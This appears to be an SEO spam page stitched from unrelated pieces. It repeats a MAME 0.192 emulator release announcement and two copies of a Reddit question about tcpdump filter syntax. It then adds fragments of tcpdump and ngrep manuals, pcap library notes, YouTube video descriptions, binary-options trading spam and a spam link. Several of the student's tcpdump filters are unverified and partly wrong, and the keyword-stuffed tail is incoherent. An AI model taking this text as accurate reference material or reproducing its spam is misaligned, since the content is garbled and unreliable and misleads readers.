Even if you’re still feeling burned from Singles’ Day, Thanksgiving, and/or Black Friday, MAME 0.192 is here, and there’s plenty packed into this update. At long last, the MCU for Ping Pong King is simulated, making the game playable, and Flower now runs better than it ever did. Taito’s abstract maze game Marine Date is also emulated better than ever, although there are still some issues with collision detection. We’ve got newly dumped prototypes, including a prototype of Battlecry, and a more complete version of Grudge Match that appears to come from a location test in Italy. Many of the Aristocrat MK5 gambling machines have been redumped so the ROM checksums pass and they boot. Missing graphics in the Merit Megatouch games have been fixed.
But we know that rumours about the next part of this announcement have made lots of arcade fans excited: IGS PGM2 software is showing signs of life. I’m sure at least some of you are wondering how this was achieved. Usual suspects Morten Shearman Kirkegaard and Peter Wilhelmsen (recently featured here in connection to their success in dumping Gaelco protection programs) have built another FPGA-based rig that allowed them to dump the internal programs from the ARM CPUs for Oriental Legend 2 and Knights of Valour 2 New Legend. On top of this, there are some nice performance improvements to MAME’s MPEG audio decoding that should benefit other systems as well.
In computer system emulation, we’ve got a number of graphical fixes for FM Towns, heaps of improvements for the Tatung Einstein, No-Slot Clock support for the Apple //e family, and support for some Brazilian CoCo clones from Prológica and Codimex. There are some big updates to the PC software lists, too. The ACI Destiny Prodigy, Mephisto RISC 1MB and Mephisto RISC II chess computers are now working. Finally, the Interpro drivers have numerous improvements, including preliminary keyboard/video support.
That’s just scratching the surface – there are far more bug fixes, newly dumped system and performance improvements. You can get the source or Windows binaries from the download page.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to MAME [link] [comments]

MAME 0.192

MAME 0.192

Even if you’re still feeling burned from Singles’ Day, Thanksgiving, and/or Black Friday, MAME 0.192 is here, and there’s plenty packed into this update. At long last, the MCU for Ping Pong King is simulated, making the game playable, and Flower now runs better than it ever did. Taito’s abstract maze game Marine Date is also emulated better than ever, although there are still some issues with collision detection. We’ve got newly dumped prototypes, including a prototype of Battlecry, and a more complete version of Grudge Match that appears to come from a location test in Italy. Many of the Aristocrat MK5 gambling machines have been redumped so the ROM checksums pass and they boot. Missing graphics in the Merit Megatouch games have been fixed.
But we know that rumours about the next part of this announcement have made lots of arcade fans excited: IGS PGM2 software is showing signs of life. I’m sure at least some of you are wondering how this was achieved. Usual suspects Morten Shearman Kirkegaard and Peter Wilhelmsen (recently featured here in connection to their success in dumping Gaelco protection programs) have built another FPGA-based rig that allowed them to dump the internal programs from the ARM CPUs for Oriental Legend 2 and Knights of Valour 2 New Legend. On top of this, there are some nice performance improvements to MAME’s MPEG audio decoding that should benefit other systems as well.
In computer system emulation, we’ve got a number of graphical fixes for FM Towns, heaps of improvements for the Tatung Einstein, No-Slot Clock support for the Apple //e family, and support for some Brazilian CoCo clones from Prológica and Codimex. There are some big updates to the PC software lists, too. The ACI Destiny Prodigy, Mephisto RISC 1MB and Mephisto RISC II chess computers are now working. Finally, the Interpro drivers have numerous improvements, including preliminary keyboard/video support.
That’s just scratching the surface – there are far more bug fixes, newly dumped system and performance improvements. You can get the source or Windows binaries from the download page.

MAMETesters Bugs Fixed

New working machines

New working clones

Machines promoted to working

Clones promoted to working

New machines marked as NOT_WORKING

New clones marked as NOT_WORKING

New working software list additions

Software list items promoted to working

New NOT_WORKING software list additions

Translations added or modified

Source Changes

submitted by cuavas to cade [link] [comments]

Are my TCPdump filters correct?

I am working on learning to use tcpdump filters without keywords and I think I am doing a pretty good job with these but after trying to check my answers on line I am thinking that I have a few of them slightly wrong but I am not exactly sure. I was hoping that someone could help and explain why my filter is wrong.
Full disclosure I haven't tried any of the filters out since I am trying to write them correctly before I test them on real packets. My exam wont allow me access to testing the filters before I submit them.
  1. Find all of the packets containing ONLY a “SYN” flag
    Tcpdump –n –r testfile.pcap ‘tcp[13] = 2’ or should it be 'tcp[13] 2!=0' I thought that if it equals 2 the only way for that to happen was if in the binary that bit was set to 1 and then it equals 2 in decimal. 
  2. Find all of the packets containing a “FIN ACK” flags.
    Tcpdump –n –r testfile.pcap ‘tcp[13] = 17’ Same thing here where in binary it would equal 17 with the 5th and 1st bits set to 1? 
  3. Find all DNS packets.
    Tcpdump –n –r testfile.pcap ‘udp[0:2] = 0x35 & upd[2:2] = 0x35’ To capture traffic both ways I need source and destination set to DNS? 
  4. Find the ICMP Echo requests ONLY.
     tcpdump –n –r testfile.pcap ‘icmp[0] = 8’ This one seemed pretty straight forward to me. 
  5. Find any packets that have TCP options.
    Tcpdump –n –r testfile.pcap ‘tcp[20:4] > 0’ This one should also work? Any set options would make it greater than 0 
submitted by ITBry to networking [link] [comments]

TCPdump filter help

I am working on learning to use tcpdump filters without keywords and I think I am doing a pretty good job with these but after trying to check my answers on line I am thinking that I have a few of them slightly wrong but I am not exactly sure. I was hoping that someone could help and explain why my filter is wrong.
Full disclosure I havent tried any of the filters out since I am trying to write them correctly before I test them on real packets. My exam wont allow me access to testing the filters before I submit them.
1. Find all of the packets containing ONLY a “SYN” flag
Tcpdump –n –r testfile.pcap ‘tcp[13] = 2’ or should it be 'tcp[13] 2!=0'
I thought that if it equals 2 the only way for that to happen was if in the binary that bit was set to 1 and then it equals 2 in decimal.
2. Find all of the packets containing a “FIN ACK” flags.
Tcpdump –n –r testfile.pcap ‘tcp[13] = 17’
Same thing here where in binary it would equal 17 with the 5th and 1st bits set to 1?
3. Find all DNS packets.
Tcpdump –n –r testfile.pcap ‘udp[0:2] = 0x35 & upd[2:2] = 0x35’
To capture traffic both ways I need source and destination set to DNS?
4. Find the ICMP Echo requests ONLY.
tcpdump –n –r testfile.pcap ‘icmp[0] = 8’
5.Find any packets that have TCP options.
Tcpdump –n –r testfile.pcap ‘tcp[20:4] > 0’ This one should also work? Any set options would make it greater than 0
submitted by ITBry to AskNetsec [link] [comments]

Real-time Network Monitoring  Analyzing a PCAP with PRADS  Mentorship 2020 Alexey Anikin - Data Science for Industrial Sector R&D and Industrial Solutions Install with dependencies ANDROID AIRGEDDON تنصيب مع الأدوات Educational content WinSIP Installation The Complete Linux Course: Beginner to Power User! - YouTube How easy is it to capture data on public free Wi-Fi ... WAP2150 Intro Using Wireshark's Decode As Feature - YouTube Introduction to TCPDUMP - YouTube How to use Re2PCAP

OPTIONS-A Print each packet (minus its link level header) in ASCII. Handy for capturing web pages. -b Print the AS number in BGP packets in ASDOT notation rather than ASPLAIN notation. -B buffer_size--buffer-size=buffer_size Set the operating system capture buffer size to buffer_size, in units of KiB (1024 bytes). -c count Exit after receiving count packets. --count Print only on stderr the ... Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems ... Options-h Display help/usage information. -N ... When reading pcap_dump files, replay them at their recorded time intervals (mimic realtime). -t Print a timestamp in the form of YYYY/MM/DD HH:MM:SS.UUUUUU everytime a packet is matched. -T Print a timestamp in the form of +S.UUUUUU, indicating the delta between packet matches. -R Do not try to drop privileges to the DROPPRIVS_USER. ngrep makes ... Nov. 1. Pcap Binary Options binary. put eth0.pcap. put eth1.pcap (if running a packet tract on a two-armed configuration) bye. 16. It is now possible to retrieve the packet capture files from the FTP server and analyse them in the application of choice, for example Wireshark. 17. Use the exit command to exit the Diagnostic Shell. The de facto standard network packet capture format is libpcap (pcap), which is used in packet analyzers such as tcpdump/WinDump and Wireshark. The pcap file format is a binary format, with support for nanosecond-precision timestamps. Although this format varies somewhat from implementation to implementation, all pcap files have the general structure shown in Fig. 1. couchbase-lww.pcap (libpcap) A sample Couchbase binary protocol file including set_with_meta, del_with_meta and get_meta commands with last write wins support. couchbase-xattr.pcapng (libpcap) A sample capture of the XATTR features in the Couchbase binary protocol. dct2000_test.out (dct2000) A sample DCT2000 file with examples of most supported link types . dhcp.pcap (libpcap) A sample of DHCP ... Main pcap man page (MORE pcap man pages) rpcapd man page; Programming with pcap by Tim Carstens. libpcap: An Architecture and Optimization Methodology for Packet Capture Steve McCanne, CTO Riverbed Technology - Sharkfest'11. Packet Capture With libpcap and other Low Level Network Tricks. NAU's Computer Systems Engineering. Aprendiendo a programar con libpcap (in Spanish), by Alejandro Lopez ... Set the options of the linker to include the wpcap.lib library file specific for your target (x86 ... and how to save a capture to disk. It can be compiled under Win32 or Unix (projects and makefiles are provided). Pcap_filter (pf.exe) is a general-purpose packet filtering application: its input parameters are a source of packets (it can be a physical interface or a file), a filter and an ... Kaufen Sie Billig Schwäbisch Gmünd (Baden-Württemb.) Monday, 1 May 2017. Pcap Binary Options

[index] [25753] [13122] [16704] [24905] [8561] [9436] [4788] [634] [204] [29274]

Real-time Network Monitoring Analyzing a PCAP with PRADS Mentorship 2020

Get The Complete Linux Administration Course Bundle! https://josephdelgadillo.com/product/linux-course-bundle/ If you want to get started using Linux, you wi... With slim, elegant and interactive HMI system, satisfy the increasing demand for automation sector. In addition, PCAP Touch Panel Mount Panel PC can be applied to different scenarios. Increase the ... Twitter: @davidmahler LinkedIn: https://www.linkedin.com/in/davidmahler Links: reference: www.tcpdump.org reference: tcpdump man page! tcpdump options used i... PRADS is a Passive Real-time Asset Detection System, using digital fingerprints (PCAP's) to recognize services on the wire, and can be used to map your network, letting you know what services and ... You should always exercise caution when connecting to open Wi-Fi. But here is the question, just how easy is it to capture data from public free Wi-Fi? Gary ... Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42. BLW Online Trading Recommended for you. 43:42. Snort 3 - Logging (with labs) - Duration: 7:21. ... Development of PCAP technology for industrial applications - Duration: 3:38. ... Best Binary Options Strategy 2020 - 2 Minute Strategy LIVE TRAINING! - Duration: 43:42. BLW Online Trading ... Python Script: Python Script To get Audio from VOIP Packet Capture (PCAP) file - Duration: 13:58. Brian Warner 15,472 views ANDROID AIRGEDDON Install with dependencies تنصيب مع الأدوات Educational content WARNING DISCLAIMER - Everything shown in this video must be used for Educational purposes. - All ... Wireshark does a great job Identifying, Decoding, Dissecting and presenting packets and their associated packets. Every so often you may find that Wireshark ...

https://binaryoptiontrade.datecuau.ml